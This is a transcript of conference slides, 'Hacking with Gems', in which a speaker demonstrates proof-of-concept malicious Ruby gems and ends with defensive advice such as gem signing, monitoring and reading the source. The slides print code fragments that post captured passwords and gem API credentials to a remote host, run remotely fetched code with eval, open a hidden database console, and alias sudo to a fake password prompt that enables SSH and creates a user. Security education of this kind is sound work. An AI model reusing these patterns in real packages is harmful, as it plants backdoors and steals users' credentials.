Hacking with Gems (Ancient City Ruby)

Transcript

1. Hacking with Gems Benjamin Smith @benjamin_smith

2. How-to get rich quick and (maybe) not go to jail!

3. Ben Smith cannot be held accountable for anything that will

   happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

4. who i am

5. None
6. None
7. None

8. what i am NOT

9. None

10. please do not try this at home

11. please do not try this at home

12. how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)

    actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ...

13. what’s the worst that could happen?

14. None

15. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

16. before... github.com/benjaminleesmith/awesome-rails-flash-messages

17. after! github.com/benjaminleesmith/awesome-rails-flash-messages

18. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

19. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

20. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

21. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

22. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

23. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

24. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

25. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

26. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

27. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

28. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

29. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

30. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

31. a one way ticket to

32. that was easy. what else can I do?

33. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

34. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

35. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

36. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

37. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

38. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

39. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

40. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

41. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

42. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

43. /users/sign_in github.com/benjaminleesmith/net_http_detector

44. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

45. hello db access! github.com/benjaminleesmith/net_http_detector

46. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

47. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

48. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

49. careful of wolves in sheep’s clothing

50. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

51. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

52. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

53. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

54. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

55. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

56. i like the beach

57. that was easy. what else can I do?

58. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

59. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
60. None

61. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

62. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

63. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

64. what what github.com/benjaminleesmith/better_date_to_s

65. i can haz source github.com/benjaminleesmith/better_date_to_s

66. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

67. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

68. that was easy hard. what else can I do? (that's

    easier)

69. gem install be_truthy github.com/benjaminleesmith/be_truthy

70. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

71. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

72. github.com/benjaminleesmith/be_truthy

73. file tree looks ok github.com/benjaminleesmith/be_truthy

74. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

75. but what was this? github.com/benjaminleesmith/be_truthy

76. I see no C github.com/benjaminleesmith/be_truthy

77. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

78. there is no Rakefile github.com/benjaminleesmith/be_truthy

79. the real file tree github.com/benjaminleesmith/be_truthy

80. the real file tree github.com/benjaminleesmith/be_truthy

81. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

82. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

83. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

84. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

85. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

86. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

87. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

88. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

89. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

90. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

91. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

92. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

93. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

94. take away: don't install ben's gems

95. None

96. how could I get you to install my gems?

97. what gems are trustworthy?

98. how can I add my code to already trusted gems?

99. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

100. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

101. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

102. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

103. now I own your gems github.com/benjaminleesmith/be_truthy

104. > git clone your-gem-repo ...add a little code... > rake

     build > gem push your-gem github.com/benjaminleesmith/be_truthy

105. do people trust your gems?

106. do people who install your gems have trustworthy gems?

107. None

108. there’s still one problem

109. bootstrapping

110. being popular sucks

111. conferences

112. webmock

113. rspec-given

114. quacky

115. social engineering

116. None
117. None

118. • matt • smoe • bttf • james • tlittle

     • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb

119. so what happens now?

120. ruby gems goes down

121. heroku deploys go down

122. i go to the beach

123. ruby gems goes down

124. heroku deploys go down

125. recovery

126. so what now?

127. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

128. Little Snitch obdev.at/products/littlesnitch/index.html

129. gem install be_truthy github.com/benjaminleesmith/be_truthy

130. fseventer fernlightning.com/doku.php?id=software:fseventer:start

131. don’t “gem install” from strangers

132. gem fetch vs gem install > gem fetch be_truthy >

     gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
133. None
134. None

135. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

136. gem install rails -P HighSecurity

137. > gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

     While executing gem ... (Gem::Exception) Unsigned gem

138. gem cert --build

139. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

140. sandboxing

141. github.com/rubygems/rubygems

142. tools to detect malicious code

143. private gem repos

144. do not try this at home

145. don't install gems you don't need to

146. pay attention to what your gems do

147. monitor your system

148. read the source

149. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

150. on install github.com/benjaminleesmith/coal-mine-canary

151. the results github.com/benjaminleesmith/coal-mine-canary

152. thank you!

153. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith